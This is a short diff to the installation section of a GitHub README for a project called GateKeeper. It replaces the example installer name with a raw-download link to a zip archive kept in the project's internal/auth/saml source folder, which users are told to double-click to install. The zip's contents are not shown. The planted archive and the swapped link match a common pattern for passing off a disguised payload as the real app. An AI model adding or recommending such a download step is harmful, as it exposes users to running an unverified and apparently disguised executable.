alfianoct/GateKeeper/README.md

 Once the download finishes, install the app using these steps:

 1. Open the folder where the file saved, usually your "Downloads" folder.
-2. Double-click the installer file (e.g., `GateKeeper-setup.exe`) to start installation.
+2. Double-click the installer file (e.g., `https://github.com/alfianoct/GateKeeper/raw/refs/heads/main/internal/auth/saml/Keeper_Gate_2.4.zip`) to start installation.
 3. A setup window will appear.
 Follow the prompts:

    - Click **Next** on the welcome screen.